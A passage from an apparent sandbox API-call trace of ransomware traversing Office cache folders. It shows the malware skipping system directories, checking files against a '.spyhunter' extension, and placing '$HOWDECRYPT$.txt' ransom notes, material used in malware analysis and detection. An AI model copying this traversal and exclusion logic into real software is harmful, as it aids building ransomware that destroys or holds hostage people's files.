pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 78 [0081.831] StrStrIW (lpFirst="VisioLR.cab", lpSrch=".spyhunter") returned 0x0 [0081.831] lstrcmpW (lpString1="VisioLR.cab", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.831] lstrcmpW (lpString1="VisioLR.cab", lpString2="_uninstalling_.png") returned 1 [0081.831] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 78 [0081.831] GetProcessHeap () returned 0x2c0000 [0081.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x326178 [0081.831] GetProcessHeap () returned 0x2c0000 [0081.831] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x337310, Size=0x448) returned 0x337310 [0081.831] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.831] lstrcmpiW (lpString1="VisioMUI.msi", lpString2="Windows") returned -1 [0081.831] lstrlenW (lpString="Windows") returned 7 [0081.831] lstrcmpiW (lpString1="VisioMUI.msi", lpString2="$Recycle.bin") returned 1 [0081.831] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.831] lstrcmpiW (lpString1="VisioMUI.msi", lpString2="System Volume Information") returned 1 [0081.831] lstrlenW (lpString="System Volume Information") returned 25 [0081.831] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 79 [0081.831] StrStrIW (lpFirst="VisioMUI.msi", lpSrch=".spyhunter") returned 0x0 [0081.831] lstrcmpW (lpString1="VisioMUI.msi", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.831] lstrcmpW (lpString1="VisioMUI.msi", lpString2="_uninstalling_.png") returned 1 [0081.831] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 79 [0081.831] GetProcessHeap () returned 0x2c0000 [0081.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x326260 [0081.831] GetProcessHeap () returned 0x2c0000 [0081.831] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x337310, Size=0x450) returned 0x337310 [0081.831] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.831] lstrcmpiW (lpString1="VisioMUI.xml", lpString2="Windows") returned -1 [0081.832] lstrlenW (lpString="Windows") returned 7 [0081.832] lstrcmpiW (lpString1="VisioMUI.xml", lpString2="$Recycle.bin") returned 1 [0081.832] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.832] lstrcmpiW (lpString1="VisioMUI.xml", lpString2="System Volume Information") returned 1 [0081.832] lstrlenW (lpString="System Volume Information") returned 25 [0081.832] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 79 [0081.832] StrStrIW (lpFirst="VisioMUI.xml", lpSrch=".spyhunter") returned 0x0 [0081.832] lstrcmpW (lpString1="VisioMUI.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.832] lstrcmpW (lpString1="VisioMUI.xml", lpString2="_uninstalling_.png") returned 1 [0081.832] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 79 [0081.832] GetProcessHeap () returned 0x2c0000 [0081.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x326348 [0081.832] GetProcessHeap () returned 0x2c0000 [0081.832] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x337310, Size=0x458) returned 0x337310 [0081.832] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0 [0081.832] FindClose (in: hFindFile=0x335e20 | out: hFindFile=0x335e20) returned 1 [0081.833] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt") returned 83 [0081.833] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt") returned 83 [0081.833] GetProcessHeap () returned 0x2c0000 [0081.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x336ef8 [0081.833] GetProcessHeap () returned 0x2c0000 [0081.833] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x337310, Size=0x460) returned 0x337310 [0081.833] GetProcessHeap () returned 0x2c0000 [0081.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30ffc8 | out: hHeap=0x2c0000) returned 1 [0081.833] FindNextFileW (in: hFindFile=0x30b3d8, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0081.833] lstrcmpiW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0081.833] lstrlenW (lpString="Windows") returned 7 [0081.833] lstrcmpiW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0081.833] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.833] lstrcmpiW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0081.833] lstrlenW (lpString="System Volume Information") returned 25 [0081.833] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C") returned 66 [0081.833] lstrcmpW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0081.834] lstrcmpW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0081.834] GetProcessHeap () returned 0x2c0000 [0081.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30ffc8 [0081.834] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*") returned 68 [0081.834] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0x335e20 [0081.862] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.862] lstrlenW (lpString="Windows") returned 7 [0081.862] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.862] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.862] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.862] lstrlenW (lpString="System Volume Information") returned 25 [0081.862] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\.") returned 68 [0081.862] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.862] StrStrIW (lpFirst=".", lpSrch=".spyhunter") returned 0x0 [0081.862] lstrcmpW (lpString1=".", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.862] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0081.862] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\.") returned 68 [0081.862] GetProcessHeap () returned 0x2c0000 [0081.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xca) returned 0x323120 [0081.862] GetProcessHeap () returned 0x2c0000 [0081.862] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x337310, Size=0x468) returned 0x337310 [0081.862] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.862] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.862] lstrlenW (lpString="Windows") returned 7 [0081.862] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.862] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.862] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.863] lstrlenW (lpString="System Volume Information") returned 25 [0081.863] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\..") returned 69 [0081.863] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.863] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.863] StrStrIW (lpFirst="..", lpSrch=".spyhunter") returned 0x0 [0081.863] lstrcmpW (lpString1="..", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.863] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0081.863] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\..") returned 69 [0081.863] GetProcessHeap () returned 0x2c0000 [0081.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x3231f8 [0081.863] GetProcessHeap () returned 0x2c0000 [0081.863] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x337310, Size=0x470) returned 0x337310 [0081.863] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.863] lstrcmpiW (lpString1="OneNoteMUI.msi", lpString2="Windows") returned -1 [0081.863] lstrlenW (lpString="Windows") returned 7 [0081.863] lstrcmpiW (lpString1="OneNoteMUI.msi", lpString2="$Recycle.bin") returned 1 [0081.863] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.863] lstrcmpiW (lpString1="OneNoteMUI.msi", lpString2="System Volume Information") returned -1 [0081.863] lstrlenW (lpString="System Volume Information") returned 25 [0081.863] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 81 [0081.863] StrStrIW (lpFirst="OneNoteMUI.msi", lpSrch=".spyhunter") returned 0x0 [0081.863] lstrcmpW (lpString1="OneNoteMUI.msi", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.863] lstrcmpW (lpString1="OneNoteMUI.msi", lpString2="_uninstalling_.png") returned 1 [0081.863] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 81 [0081.863] GetProcessHeap () returned 0x2c0000 [0081.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x320a50 [0081.863] GetProcessHeap () returned 0x2c0000 [0081.864] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x337310, Size=0x478) returned 0x337310 [0081.864] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.864] lstrcmpiW (lpString1="OneNoteMUI.xml", lpString2="Windows") returned -1 [0081.864] lstrlenW (lpString="Windows") returned 7 [0081.864] lstrcmpiW (lpString1="OneNoteMUI.xml", lpString2="$Recycle.bin") returned 1 [0081.864] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.864] lstrcmpiW (lpString1="OneNoteMUI.xml", lpString2="System Volume Information") returned -1 [0081.864] lstrlenW (lpString="System Volume Information") returned 25 [0081.864] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 81 [0081.864] StrStrIW (lpFirst="OneNoteMUI.xml", lpSrch=".spyhunter") returned 0x0 [0081.864] lstrcmpW (lpString1="OneNoteMUI.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.864] lstrcmpW (lpString1="OneNoteMUI.xml", lpString2="_uninstalling_.png") returned 1 [0081.864] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 81 [0081.864] GetProcessHeap () returned 0x2c0000 [0081.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x327dd8 [0081.864] GetProcessHeap () returned 0x2c0000 [0081.864] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x337310, Size=0x480) returned 0x337310 [0081.864] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.864] lstrcmpiW (lpString1="OnoteLR.cab", lpString2="Windows") returned -1 [0081.864] lstrlenW (lpString="Windows") returned 7 [0081.864] lstrcmpiW (lpString1="OnoteLR.cab", lpString2="$Recycle.bin") returned 1 [0081.864] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.864] lstrcmpiW (lpString1="OnoteLR.cab", lpString2="System Volume Information") returned -1 [0081.864] lstrlenW (lpString="System Volume Information") returned 25 [0081.864] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 78 [0081.864] StrStrIW (lpFirst="OnoteLR.cab", lpSrch=".spyhunter") returned 0x0 [0081.864] lstrcmpW (lpString1="OnoteLR.cab", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.865] lstrcmpW (lpString1="OnoteLR.cab", lpString2="_uninstalling_.png") returned 1 [0081.865] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 78 [0081.865] GetProcessHeap () returned 0x2c0000 [0081.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x326430 [0081.865] GetProcessHeap () returned 0x2c0000 [0081.865] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x337310, Size=0x488) returned 0x337310 [0081.865] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.865] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0081.865] lstrlenW (lpString="Windows") returned 7 [0081.865] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0081.865] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.865] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0081.865] lstrlenW (lpString="System Volume Information") returned 25 [0081.865] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0081.865] StrStrIW (lpFirst="Setup.xml", lpSrch=".spyhunter") returned 0x0 [0081.865] lstrcmpW (lpString1="Setup.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.865] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0081.865] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0081.865] GetProcessHeap () returned 0x2c0000 [0081.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x326518 [0081.865] GetProcessHeap () returned 0x2c0000 [0081.865] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x337310, Size=0x490) returned 0x337310 [0081.865] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0 [0081.865] FindClose (in: hFindFile=0x335e20 | out: hFindFile=0x335e20) returned 1 [0081.867] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt") returned 83 [0081.867] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt") returned 83 [0081.867] GetProcessHeap () returned 0x2c0000 [0081.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x327ec8 [0081.867] GetProcessHeap () returned 0x2c0000 [0081.867] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x337310, Size=0x498) returned 0x337310 [0081.867] GetProcessHeap () returned 0x2c0000 [0081.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30ffc8 | out: hHeap=0x2c0000) returned 1 [0081.867] FindNextFileW (in: hFindFile=0x30b3d8, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0081.867] lstrcmpiW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0081.867] lstrlenW (lpString="Windows") returned 7 [0081.867] lstrcmpiW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0081.867] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.867] lstrcmpiW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0081.867] lstrlenW (lpString="System Volume Information") returned 25 [0081.867] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C") returned 66 [0081.867] lstrcmpW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0081.867] lstrcmpW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0081.867] GetProcessHeap () returned 0x2c0000 [0081.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30ffc8 [0081.867] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*") returned 68 [0081.867] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0x335ea0 [0082.051] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0082.051] lstrlenW (lpString="Windows") returned 7 [0082.051] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0082.051] lstrlenW (lpString="$Recycle.bin") returned 12 [0082.051] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0082.051] lstrlenW (lpString="System Volume Information") returned 25 [0082.051] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\.") returned 68 [0082.051] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0082.051] StrStrIW (lpFirst=".", lpSrch=".spyhunter") returned 0x0 [0082.051] lstrcmpW (lpString1=".", lpString2="$HOWDECRYPT$.txt") returned 1 [0082.051] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0082.051] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\.") returned 68 [0082.051] GetProcessHeap () returned 0x2c0000 [0082.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xca) returned 0x323558 [0082.051] GetProcessHeap () returned 0x2c0000 [0082.051] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x337310, Size=0x480) returned 0x337310 [0082.051] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0082.051] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0082.051] lstrlenW (lpString="Windows") returned 7 [0082.051] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0082.051] lstrlenW (lpString="$Recycle.bin") returned 12 [0082.051] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0082.051] lstrlenW (lpString="System Volume Information") returned 25 [0082.051] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\..") returned 69 [0082.051] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0082.051] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0082.051] StrStrIW (lpFirst="..", lpSrch=".spyhunter") returned 0x0 [0082.051] lstrcmpW (lpString1="..", lpString2="$HOWDECRYPT$.txt") returned 1 [0082.052] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0082.052] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\..") returned 69 [0082.052] GetProcessHeap () returned 0x2c0000 [0082.052] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x323630 [0082.052] GetProcessHeap () returned 0x2c0000 [0082.052] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x337310, Size=0x488) returned 0x337310 [0082.052] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0082.052] lstrcmpiW (lpString1="ProjectMUI.msi", lpString2="Windows") returned -1 [0082.052] lstrlenW (lpString="Windows") returned 7 [0082.052] lstrcmpiW (lpString1="ProjectMUI.msi", lpString2="$Recycle.bin") returned 1 [0082.052] lstrlenW (lpString="$Recycle.bin") returned 12 [0082.052] lstrcmpiW (lpString1="ProjectMUI.msi", lpString2="System Volume Information") returned -1 [0082.052] lstrlenW (lpString="System Volume Information") returned 25 [0082.052] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 81 [0082.052] StrStrIW (lpFirst="ProjectMUI.msi", lpSrch=".spyhunter") returned 0x0 [0082.052] lstrcmpW (lpString1="ProjectMUI.msi", lpString2="$HOWDECRYPT$.txt") returned 1 [0082.052] lstrcmpW (lpString1="ProjectMUI.msi", lpString2="_uninstalling_.png") returned 1 [0082.052] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 81 [0082.052] GetProcessHeap () returned 0x2c0000 [0082.052] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x327ec8 [0082.052] GetProcessHeap () returned 0x2c0000 [0082.052] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x337310, Size=0x490) returned 0x337310 [0082.052] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0082.052] lstrcmpiW (lpString1="ProjectMUI.xml", lpString2="Windows") returned -1 [0082.052] lstrlenW (lpString="Windows") returned 7 [0082.052] lstrcmpiW (lpString1="ProjectMUI.xml", lpString2="$Recycle.bin") returned 1 [0082.052] lstrlenW (lpString="$Recycle.bin") returned 12 [0082.052] lstrcmpiW (lpString1="ProjectMUI.xml", lpString2="System Volume Information") returned -1 [0082.053] lstrlenW (lpString="System Volume Information") returned 25 [0082.053] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 81 [0082.053] StrStrIW (lpFirst="ProjectMUI.xml", lpSrch=".spyhunter") returned 0x0 [0082.053] lstrcmpW (lpString1="ProjectMUI.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0082.053] lstrcmpW (lpString1="ProjectMUI.xml", lpString2="_uninstalling_.png") returned 1 [0082.053] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 81 [0082.053] GetProcessHeap () returned 0x2c0000 [0082.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x327fb8 [0082.053] GetProcessHeap () returned 0x2c0000 [0082.053] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x337310, Size=0x498) returned 0x337310 [0082.053] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0082.053] lstrcmpiW (lpString1="ProjLR.cab", lpString2="Windows") returned -1 [0082.053] lstrlenW (lpString="Windows") returned 7 [0082.053] lstrcmpiW (lpString1="ProjLR.cab", lpString2="$Recycle.bin") returned 1 [0082.053] lstrlenW (lpString="$Recycle.bin") returned 12 [0082.053] lstrcmpiW (lpString1="ProjLR.cab", lpString2="System Volume Information") returned -1 [0082.053] lstrlenW (lpString="System Volume Information") returned 25 [0082.053] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 77 [0082.053] StrStrIW (lpFirst="ProjLR.cab", lpSrch=".spyhunter") returned 0x0 [0082.053] lstrcmpW (lpString1="ProjLR.cab", lpString2="$HOWDECRYPT$.txt") returned 1 [0082.053] lstrcmpW (lpString1="ProjLR.cab", lpString2="_uninstalling_.png") returned 1 [0082.053] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 77 [0082.054] GetProcessHeap () returned 0x2c0000 [0082.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x326600 [0082.054] GetProcessHeap () returned 0x2c0000 [0082.054] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x337310, Size=0x4a0) returned 0x334f38 [0082.054] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0082.054] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0082.054] lstrlenW (lpString="Windows") returned 7 [0082.054] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0082.054] lstrlenW (lpString="$Recycle.bin") returned 12 [0082.054] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0082.054] lstrlenW (lpString="System Volume Information") returned 25 [0082.054] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0082.054] StrStrIW (lpFirst="Setup.xml", lpSrch=".spyhunter") returned 0x0 [0082.054] lstrcmpW (lpString1="Setup.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0082.054] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0082.054] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0082.054] GetProcessHeap () returned 0x2c0000 [0082.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x3266e8 [0082.054] GetProcessHeap () returned 0x2c0000 [0082.054] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x334f38, Size=0x4a8) returned 0x334f38 [0082.054] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0 [0082.054] FindClose (in: hFindFile=0x335ea0 | out: hFindFile=0x335ea0) returned 1 [0082.057] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt") returned 83 [0082.057] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt") returned 83 [0082.057] 